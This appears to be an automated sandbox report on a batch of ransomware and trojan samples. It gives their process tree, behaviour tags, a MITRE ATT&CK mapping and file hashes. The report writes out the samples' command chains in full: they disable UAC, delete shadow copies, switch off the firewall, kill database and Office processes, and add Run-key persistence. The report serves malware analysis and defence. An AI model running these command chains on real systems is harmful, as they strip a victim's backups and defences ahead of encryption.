C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"4⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
C:\Windows\SysWOW64\find.exefind /i "os name"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"4⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
C:\Windows\SysWOW64\find.exefind /i "original"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes4⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable5⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe5⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f® delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f4⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f5⤵
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\Documents and Settings\RCRU_64.exe /f® add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\Documents and Settings\RCRU_64.exe /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\Documents and Settings\RCRU_64.exe /f5⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\Documents and Settings\RCRU_64.exe /f5⤵
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exeHEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exeHEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-ada8cc55f7ffb82ebc1e00dbd591f18e9f5d0e76dffa44dec99beaf152e058cc.exe" +s +h6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\00466" +s +h5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Desktop\00466" +s +h6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Documents\MSDCSC\locQi1ySlvoS\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\locQi1ySlvoS\msdcsc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Documents\MSDCSC\locQi1ySlvoS\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\locQi1ySlvoS\msdcsc.exe"6⤵
- Modifies firewall policy service
- Modifies security service
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- System policy modification
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"7⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
-
-
C:\Windows\SysWOW64\notepad.exenotepad7⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Shade.gen-d23c897e7bb23a6a525d1206dc792f0b81c34b4cce433614c08ce87aecd247fe.exeHEUR-Trojan-Ransom.Win32.Shade.gen-d23c897e7bb23a6a525d1206dc792f0b81c34b4cce433614c08ce87aecd247fe.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-07985c9819097683b7f2bc59cc7d02e0497f012187e05b922404421cf6e55876.exeHEUR-Trojan-Ransom.Win32.Stop.gen-07985c9819097683b7f2bc59cc7d02e0497f012187e05b922404421cf6e55876.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4338A129\setup_install.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_1.exearnatic_1.exe7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 15808⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_2.exearnatic_2.exe7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 688⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_3.exearnatic_3.exe7⤵
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_4.exearnatic_4.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_5.exearnatic_5.exe7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_6.exearnatic_6.exe7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_7.exearnatic_7.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_7.exe8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_8.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4338A129\arnatic_8.exearnatic_8.exe7⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 4846⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exeHEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe3⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exeHEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b8d2fc04-9169-4d57-b01b-efb571df78fa" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-7d6cf76c07b65850d9c11155ae8050bd10558fc326f0796693904b1736cf4faf.exe" --Admin IsNotAutoStart IsNotTask6⤵
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exeHEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe3⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exeHEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe4⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-acc3b48cd0873ffa9a1777f269ff514af019b538386306738e90fefaa18d3827.exe" --Admin IsNotAutoStart IsNotTask6⤵
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exeHEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe3⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exeHEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe4⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe"C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Stop.gen-ebb659e54a4fa329f2a0f43a3e4b7d4b4edd499dafeffd524b1ec8f9eec7e6af.exe" --Admin IsNotAutoStart IsNotTask6⤵
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-06014a9c4f874d36f8fc58792d04850440d00a468e1429d09c51ad94a5a0dc46.exeHEUR-Trojan.MSIL.Crypt.gen-06014a9c4f874d36f8fc58792d04850440d00a468e1429d09c51ad94a5a0dc46.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-1c5ad7c9da1e7dad1fd4f36d94bd8460eb27ce43588a9ab39042d2939fb47aeb.exeHEUR-Trojan.MSIL.Crypt.gen-1c5ad7c9da1e7dad1fd4f36d94bd8460eb27ce43588a9ab39042d2939fb47aeb.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-218f7f7b8ef1f5137f9898d4aa830ddaca357c7d4788844225d29f866e0a3542.exeHEUR-Trojan.MSIL.Crypt.gen-218f7f7b8ef1f5137f9898d4aa830ddaca357c7d4788844225d29f866e0a3542.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-23e28204577c5dee3da2e6e63fc67ef102c032552d1a49815f1df0c6d6e9055c.exeHEUR-Trojan.MSIL.Crypt.gen-23e28204577c5dee3da2e6e63fc67ef102c032552d1a49815f1df0c6d6e9055c.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-2cb7c7c1cb918607912be236d42152a8f9d5347cabf4e815940f2b85c5d9f026.exeHEUR-Trojan.MSIL.Crypt.gen-2cb7c7c1cb918607912be236d42152a8f9d5347cabf4e815940f2b85c5d9f026.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-35e5173b554d9b449fbf3da5f91f398393a65c081b8660aa48dd20eb3f0040db.exeHEUR-Trojan.MSIL.Crypt.gen-35e5173b554d9b449fbf3da5f91f398393a65c081b8660aa48dd20eb3f0040db.exe3⤵
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan.MSIL.Crypt.gen-8ea628238f0a43298a022ff7294d95afa8c9c734d151f8945194ab386ef557b2.exeHEUR-Trojan.MSIL.Crypt.gen-8ea628238f0a43298a022ff7294d95afa8c9c734d151f8945194ab386ef557b2.exe3⤵
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5112 -ip 51121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2356 -ip 23561⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5268 -ip 52681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6096 -ip 60961⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6076 -ip 60761⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa389b855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
4Disable or Modify System Firewall
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
8Discovery
Peripheral Device Discovery
2Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD54c937a7e5cf55755116e0bcbd2591891
SHA1abd7b790ec181bd9913fdaf40260074b8dd50b29
SHA256e3dbc7e3df334a0b1f1575d0aca70ee2b7147d573208c3aad9a458f5b67dab9b
SHA512a71cf5b14b43421f554ba4d1da6ed387ca31f910144a53d1b133b6206fdaa673cbb20ba5275cb79ed8ae485f2283f6c6ee927277a81bad07c60ed35c99d6deeb
-
Filesize
1.8MB
MD50e37c7c1d6ee9819df82ed78d8a04638
SHA186e7baa63be2c58d1f180b89c38001b7cfafbc5b
SHA2567cd914ebe3f2400a70b5bb3cf6c8de8006da9bc3570a791506435820066007cb
SHA51259440e26394b22e36ce7af7c95f65ffb94da7342ed287318c99e1a62696470956fda0fc050837dcb5a834237fdfb7c1c742d50651058e5180487bb9721f07902
-
Filesize
1.3MB
MD578ebd2a95bf58efdf12213b8d438f197
SHA189a2c709db41d73b6a2178cf53a40072cdee785c
SHA2567da01c5005845d29c5d2aa71c0fbafc22a8dadb99d80a5211a6dadabdc6f3412
SHA512713a14f06d7bb27dabb80f23fefc445255e04f1872beea35f53d863488e2f3392d5f755f25021021856509a0b54da34df7820256ec5303d22c898602585d65c7
-
Filesize
728KB
MD554db8893aeb22fcd57711207d9ea2955
SHA163b0c158710263b66a236e3b4b8f5706f4e72ce2
SHA2569da9b3f5cb4279796ee860d08c8f444e922eeb6ece53320331dfc3cb89b3c857
SHA51238859923db48a4dc37d2e1c5646894212e9d2bfb029938daff0291a07cfd061ec12c493571acf5456ee1ac65cd44464b43d54f0eead00f051913e9a501d31e45
-
Filesize
180KB
MD5845e9976df9cc02056ad8ad54529b086
SHA10a4036ac75cc4eac07896dfd959d43421a953bd0
SHA256fcd31a41623474d6f589818eec6a1cf9928eacdea5e37ade3b75f32310bb07c5
SHA512f29416f1d30ed2c1f6e06e86b260b2171fb7f2c89d0ce73ad45f8cd828aff92c216105673d5874828378cfb6404a358dcff8c534b1fd1954b83d570d26f157fd
-
Filesize
1KB
MD51b38b005ee52494fb8f7c7f3a952c40c
SHA18bdf92eeee5384a54ac9507f969f5178446fb138
SHA256ae0b4e65e7c9646a56eac7d73401e5e393cec2fa50e4bd0da5473e081c7bff63
SHA512567d4b3409b725b7d683de0fecf962482a2265b6846d97bc9c8d7bc206ca878d02acb34ac3e813ca8776a80760e2824e18e823b4336c99d18ed886c774b86848
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
